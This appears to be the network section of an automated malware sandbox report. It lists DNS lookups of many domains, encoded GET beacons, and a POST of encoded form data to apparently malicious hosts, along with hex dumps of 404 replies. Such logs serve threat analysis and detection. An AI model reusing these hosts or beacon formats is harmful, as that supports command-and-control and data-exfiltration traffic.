        Source: global trafficHTTP traffic detected: GET /tcs6/?oz=UTr2VQMVaNknAPhv8pO5HUt/aSD/OuAvYfufonxWcuzqKYzjt00ESHNOp8OZd4NYpPhYAhKEfFByAl9/w+FcumGXOFp58MMDhVPqk9564kxN8Oc8kW08N+s=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.invicta.worldConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: GET /bqye/?UJ9=qN-llTKPHxntPrv0&oz=orBWFM4TMH6bEQWb0mufnyz8+/9zteVW//lS5P1UVpZ6i4UA1urKkBRolapSd+D0qVvV/pdb4OKcqrb8qmiU7f8Sw/VtSC1B9WeqmjWWYlIhrofH/7u6E+o= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.whats-in-the-box.orgConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: GET /was5/?oz=y8MnD3CAUjfvlbCaxAVac63GvK68hywkVQck0F03MMraCQdP6i6ahgEcKS99S8jCMAfRd1EgvYBIkI1gFr2JNRymkxf7KUrPibiqIzK4PCKgQN9qHiwVnD0=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.linkwave.cloudConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: GET /7k8f/?oz=1xd2XIdTc2qaFZ+FWSTYli7OxzQOBufybu6t7KDIboRfwcHmUmPthK5WfpWTXJmR/FSLDU2eJw9bxVvh/BR2RAGhDgY7k/sU7CIWPHYqUL7qqxcngXtaZyk=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.dfmagazine.shopConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: GET /txr6/?oz=nTAbXiRbAR9Tmn1EygfckhJ8auTVp3cQBZgFAHmQGrw0Kpxo+btzHXTBwKiLhdY3AsfxfRA0GE/MmBFG+RiimQs6glJH3Tq6ibBpV287KGVZpLZHDS41jcE=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.ngmr.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: GET /7cy1/?oz=NuunJUERQovrcOQM4pbN0sXyOdFy/3jSqqQUAe4+iYgeK7ulJS9OoncvbeOag3vILBHdN8yfojyADwDpW/rc4czucw94LLL42y8tkGUt2pDt0O2/v+PPRf0=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.albero-dveri.onlineConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: GET /qjs8/?oz=ejIma/W1pGRFx7ChnTgroDHkNn1VdqZgcszQV8LCwj4556o206I/YZ5OId3qzm2jECDslwuStodYNwU7Ng5KBO4as1dQdJVJJimzghFMohwqM9lhe6W/0oM=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.typ67.topConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: GET /phvf/?oz=UooqiU+uiXRphlexxihY8+pR2p1qSaCGRsMigt4MGpA/VKVyXkL8qyeifVWI1Qf9IbKjjaT+NB40EHI1csOw8bEH8rv5XgPpsHil2J4w5MJOwgpAt1bCRv0=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.greekhause.orgConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: GET /d84b/?oz=LDMXP2ida3jj6Wv8YbWYWcXQGJdr9fjlzYlCdzHaAPX6jElzFVuifqg0YZMPIM8JGTBjffDneHOFDPAe46iMAyLvyO9+lRB2GxTtOnRawDOQ6U7+wx9GICg=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.dorikis.onlineConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficDNS traffic detected: DNS query: fredy.ee
        Source: global trafficDNS traffic detected: DNS query: www.inastra.online
        Source: global trafficDNS traffic detected: DNS query: www.invicta.world
        Source: global trafficDNS traffic detected: DNS query: www.whats-in-the-box.org
        Source: global trafficDNS traffic detected: DNS query: www.linkwave.cloud
        Source: global trafficDNS traffic detected: DNS query: www.dfmagazine.shop
        Source: global trafficDNS traffic detected: DNS query: www.ngmr.xyz
        Source: global trafficDNS traffic detected: DNS query: www.albero-dveri.online
        Source: global trafficDNS traffic detected: DNS query: www.typ67.top
        Source: global trafficDNS traffic detected: DNS query: www.greekhause.org
        Source: global trafficDNS traffic detected: DNS query: www.dorikis.online
        Source: global trafficDNS traffic detected: DNS query: www.platinumkitchens.info
        Source: global trafficDNS traffic detected: DNS query: www.dhkatp.vip
        Source: global trafficDNS traffic detected: DNS query: www.tempatmudisini01.click
        Source: global trafficDNS traffic detected: DNS query: www.komart.shop
        Source: global trafficDNS traffic detected: DNS query: www.dxeg.lol
        Source: global trafficDNS traffic detected: DNS query: www.tukaari.shop
        Source: unknownHTTP traffic detected: POST /bqye/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.whats-in-the-box.orgOrigin: http://www.whats-in-the-box.orgReferer: http://www.whats-in-the-box.org/bqye/Content-Length: 199Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36Data Raw: 6f 7a 3d 6c 70 70 32 47 39 77 5a 4a 51 53 30 4d 6c 47 52 73 57 6e 56 74 53 54 63 32 4f 6f 75 6a 4a 64 50 73 38 74 7a 34 4c 55 47 55 70 38 35 6f 49 55 7a 7a 4a 50 63 39 55 74 45 35 62 38 6c 50 75 44 38 6f 31 37 51 74 59 6c 45 2b 2b 57 6a 77 4b 50 52 69 55 66 45 71 75 6f 31 38 63 45 67 55 31 56 39 32 6b 58 78 75 31 47 54 4f 57 6c 39 32 4a 36 4c 31 50 57 54 4e 75 42 59 6e 37 43 46 2f 6d 4b 2b 65 37 4f 44 69 74 51 5a 52 79 72 55 62 75 70 41 54 43 76 51 55 56 58 78 4f 79 67 69 57 57 6f 61 54 68 34 4c 6c 77 53 6a 70 35 4f 5a 50 45 7a 46 4a 34 49 49 6d 72 68 70 77 4a 4f 66 48 59 50 30 63 77 3d 3d Data Ascii: oz=lpp2G9wZJQS0MlGRsWnVtSTc2OoujJdPs8tz4LUGUp85oIUzzJPc9UtE5b8lPuD8o17QtYlE++WjwKPRiUfEquo18cEgU1V92kXxu1GTOWl92J6L1PWTNuBYn7CF/mK+e7ODitQZRyrUbupATCvQUVXxOygiWWoaTh4LlwSjp5OZPEzFJ4IImrhpwJOfHYP0cw==
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=iso-8859-1Content-Length: 282Accept-Ranges: bytesDate: Fri, 04 Oct 2024 06:30:47 GMTX-Varnish: 1110522503Age: 0Via: 1.1 varnishConnection: closeX-Varnish-Cache: MISSServer: C2M Server v1.02Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 78 72 36 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6e 67 6d 72 2e 78 79 7a 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /txr6/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=iso-8859-1Content-Length: 282Accept-Ranges: bytesDate: Fri, 04 Oct 2024 06:30:50 GMTX-Varnish: 1110522538Age: 0Via: 1.1 varnishConnection: closeX-Varnish-Cache: MISSServer: C2M Server v1.02Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 78 72 36 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6e 67 6d 72 2e 78 79 7a 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /txr6/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=iso-8859-1Content-Length: 282Accept-Ranges: bytesDate: Fri, 04 Oct 2024 06:30:53 GMTX-Varnish: 1110522577Age: 0Via: 1.1 varnishConnection: closeX-Varnish-Cache: MISSServer: C2M Server v1.02Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 78 72 36 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6e 67 6d 72 2e 78 79 7a 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /txr6/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=iso-8859-1Content-Length: 282Accept-Ranges: bytesDate: Fri, 04 Oct 2024 06:30:55 GMTX-Varnish: 1110522614Age: 0Via: 1.1 varnishConnection: closeX-Varnish-Cache: MISSServer: C2M Server v1.02Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 78 72 36 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6e 67 6d 72 2e 78 79 7a 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /txr6/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 04 Oct 2024 06:08:13 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 65 33 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb 94 6e 5b 05 be d1 d9 54 81 63 fa 9e eb 78 aa 6e e9 ea 3a be f4 45 a0 dc 46 29 8c c6 ae 0a 7b 4a 61 a6 81 ea 38 b2 51 92 ae 5b 12 bd 40 6d e4 f2 b2 7c 86 1c 45 be 69 87 21 66 99 f4 77 b0 92 ac f5 86 84 68 be 67 e2 cf ea 72 49 90 0a a1 b1 81 ec 2a eb 8a c1 0d 9b f5 d0 0e 9c 61 d4 b4 8e d5 8f ae 9f bf 70 ee d2 b9 f5 63 d6 91 2d c7 eb f8 5b 66 14 48 bb bf c6 0d 2e fa b2 23 1a 62 63 e4 d9 91 e3 7b 95 ea d5 eb 2b 47 ac 63 97 2f 37 8f 59 75 2b 1d 24 1d 4c 60 71 68 de 28 cd 1f a6 52 b6 06 d2 73 36 54 18 99 ef 86 e5 6a 09 ed 55 10 f8 c1 21 3b d4 c4 32 fa 84 81 dd 28 15 07 82 61 32 43 8f a2 0d 36 f4 33 cb 45 a8 81 ed 48 23 e1 a1 65 9b ed 54 94 6f a6 ee 20 19 2d 0d d9 b6 df 19 67 e0 6e 1b 43 d8 4a e8 7f 2d 32 5f 2b 05 2c 97 31 74 27 9f 5a ed 6e cb 75 ba bd 08 78 a0 b1 54 50 1c 87 1b b7 5a 69 05 0d 39 55 a2 47 4f 61 df 71 36 17 76 35 3c 3f 22 91 22 75 05 13 c5 5f c7 7b f1 a3 78 27 7e 2c e2 6f e3 3b c9 fb f8 78 2f de 4d 3e 48 6e e0 f3 2e 7e f7 e2 ed f8 0e 55 6f 2f 79 ed 70 b8 52 87 43 6a d7 6d 1b 84 da 0c ab bd 28 1a 86 67 2d 0b fe 67 c2 83 b5 33 78 fe 86 ef ba fe 96 f0 7c 7f a8 80 12 7c 80 1f 00 2d 2a 00 9e 65 d0 25 bf 6e b5 e1 f8 7d 08 f3 37 9a dd 4c de 4f 6e d6 2d d9 ac 5b 58 47 b3 3e b3 98 ae 6a b5 52 67 37 b6 02 39 1c 62 d0 54 c1 b3 e5 2d f6 c5 16 7c 01 cc b0 b0 11 9b a5 e7 87 11 78 c4 08 23 19 39 36 0c 30 33 eb 94 ae 8d 74 7e b2 d3 f2 44 1b 33 16 31 98 1a 4a 8b a9 a3 b7 dc ac 0f 17 77 ef 28 0d 64 78 eb b3 9b ab de 0e 9a f1 ae b6 58 fc 84 4c 19 3f 61 f3 3e d8 67 d0 29 ad 0f 17 ad bc 3d 8a 22 df 0b 33 95 63 e9 05 1c e8 4a 48 a9 3f c0 0e ae 1f b4 d8 d0 ca b3 09 6d 69 45 e8 bc a7 5a 80 c0 40 ba 6c 8f 54 ad 79 ff 5c 85 69 7b b6 0d 98 b9 30 c4 50 76 3a b0 54 cb 25 f0 cc 82 8f 68 5a 03 d0 da ea f9 4e 68 ad da 3d 65 f7 1b 4b 1d 0e 17 0b 58 7c 49 0e 86 2b e8 d6 0a fd 51 60 ab 46 26 05 f1 73 a9 f9 1b 1a 88 f0 28 8a 4b 26 f7 29 2e 81 09 bc e0 95 07 2f a9 e3 0f a4 93 d3 7c e6 3a 05 e9 75 03 cb 53 5b d6 ea 28 1a 64 92 2d 5a 00 35 a1 60 33 1a 64 c2 2f 51 91 8d 85 49 a7 eb 35 42 a8 cb eb b4 30 dc c1 6b 8d ff 01 78 fc 37 de 11 c9 47 f1 5e f2 49 72 53 c4 f7 33 82 38 5a f0 c9 70 28 b
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 04 Oct 2024 06:08:16 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 65 33 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb 94 6e 5b 05 be d1 d9 54 81 63 fa 9e eb 78 aa 6e e9 ea 3a be f4 45 a0 dc 46 29 8c c6 ae 0a 7b 4a 61 a6 81 ea 38 b2 51 92 ae 5b 12 bd 40 6d e4 f2 b2 7c 86 1c 45 be 69 87 21 66 99 f4 77 b0 92 ac f5 86 84 68 be 67 e2 cf ea 72 49 90 0a a1 b1 81 ec 2a eb 8a c1 0d 9b f5 d0 0e 9c 61 d4 b4 8e d5 8f ae 9f bf 70 ee d2 b9 f5 63 d6 91 2d c7 eb f8 5b 66 14 48 bb bf c6 0d 2e fa b2 23 1a 62 63 e4 d9 91 e3 7b 95 ea d5 eb 2b 47 ac 63 97 2f 37 8f 59 75 2b 1d 24 1d 4c 60 71 68 de 28 cd 1f a6 52 b6 06 d2 73 36 54 18 99 ef 86 e5 6a 09 ed 55 10 f8 c1 21 3b d4 c4 32 fa 84 81 dd 28 15 07 82 61 32 43 8f a2 0d 36 f4 33 cb 45 a8 81 ed 48 23 e1 a1 65 9b ed 54 94 6f a6 ee 20 19 2d 0d d9 b6 df 19 67 e0 6e 1b 43 d8 4a e8 7f 2d 32 5f 2b 05 2c 97 31 74 27 9f 5a ed 6e cb 75 ba bd 08 78 a0 b1 54 50 1c 87 1b b7 5a 69 05 0d 39 55 a2 47 4f 61 df 71 36 17 76 35 3c 3f 22 91 22 75 05 13 c5 5f c7 7b f1 a3 78 27 7e 2c e2 6f e3 3b c9 fb f8 78 2f de 4d 3e 48 6e e0 f3 2e 7e f7 e2 ed f8 0e 55 6f 2f 79 ed 70 b8 52 87 43 6a d7 6d 1b 84 da 0c ab bd 28 1a 86 67 2d 0b fe 67 c2 83 b5 33 78 fe 86 ef ba fe 96 f0 7c 7f a8 80 12 7c 80 1f 00 2d 2a 00 9e 65 d0 25 bf 6e b5 e1 f8 7d 08 f3 37 9a dd 4c de 4f 6e d6 2d d9 ac 5b 58 47 b3 3e b3 98 ae 6a b5 52 67 37 b6 02 39 1c 62 d0 54 c1 b3 e5 2d f6 c5 16 7c 01 cc b0 b0 11 9b a5 e7 87 11 78 c4 08 23 19 39 36 0c 30 33 eb 94 ae 8d 74 7e b2 d3 f2 44 1b 33 16 31 98 1a 4a 8b a9 a3 b7 dc ac 0f 17 77 ef 28 0d 64 78 eb b3 9b ab de 0e 9a f1 ae b6 58 fc 84 4c 19 3f 61 f3 3e d8 67 d0 29 ad 0f 17 ad bc 3d 8a 22 df 0b 33 95 63 e9 05 1c e8 4a 48 a9 3f c0 0e ae 1f b4 d8 d0 ca b3 09 6d 69 45 e8 bc a7 5a 80 c0 40 ba 6c 8f 54 ad 79 ff 5c 85 69 7b b6 0d 98 b9 30 c4 50 76 3a b0 54 cb 25 f0 cc 82 8f 68 5a 03 d0 da ea f9 4e 68 ad da 3d 65 f7 1b 4b 1d 0e 17 0b 58 7c 49 0e 86 2b e8 d6 0a fd 51 60 ab 46 26 05 f1 73 a9 f9 1b 1a 88 f0 28 8a 4b 26 f7 29 2e 81 09 bc e0 95 07 2f a9 e3 0f a4 93 d3 7c e6 3a 05 e9 75 03 cb 53 5b d6 ea 28 1a 64 92 2d 5a 00 35 a1 60 33 1a 64 c2 2f 51 91 8d 85 49 a7 eb 35 42 a8 cb eb b4 30 dc c1 6b 8d ff 01 78 fc 37 de 11 c9 47 f1 5e f2 49 72 53 c4 f7 33 82 38 5a f0 c9 70 28 b
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 04 Oct 2024 06:08:18 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 65 33 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb 94 6e 5b 05 be d1 d9 54 81 63 fa 9e eb 78 aa 6e e9 ea 3a be f4 45 a0 dc 46 29 8c c6 ae 0a 7b 4a 61 a6 81 ea 38 b2 51 92 ae 5b 12 bd 40 6d e4 f2 b2 7c 86 1c 45 be 69 87 21 66 99 f4 77 b0 92 ac f5 86 84 68 be 67 e2 cf ea 72 49 90 0a a1 b1 81 ec 2a eb 8a c1 0d 9b f5 d0 0e 9c 61 d4 b4 8e d5 8f ae 9f bf 70 ee d2 b9 f5 63 d6 91 2d c7 eb f8 5b 66 14 48 bb bf c6 0d 2e fa b2 23 1a 62 63 e4 d9 91 e3 7b 95 ea d5 eb 2b 47 ac 63 97 2f 37 8f 59 75 2b 1d 24 1d 4c 60 71 68 de 28 cd 1f a6 52 b6 06 d2 73 36 54 18 99 ef 86 e5 6a 09 ed 55 10 f8 c1 21 3b d4 c4 32 fa 84 81 dd 28 15 07 82 61 32 43 8f a2 0d 36 f4 33 cb 45 a8 81 ed 48 23 e1 a1 65 9b ed 54 94 6f a6 ee 20 19 2d 0d d9 b6 df 19 67 e0 6e 1b 43 d8 4a e8 7f 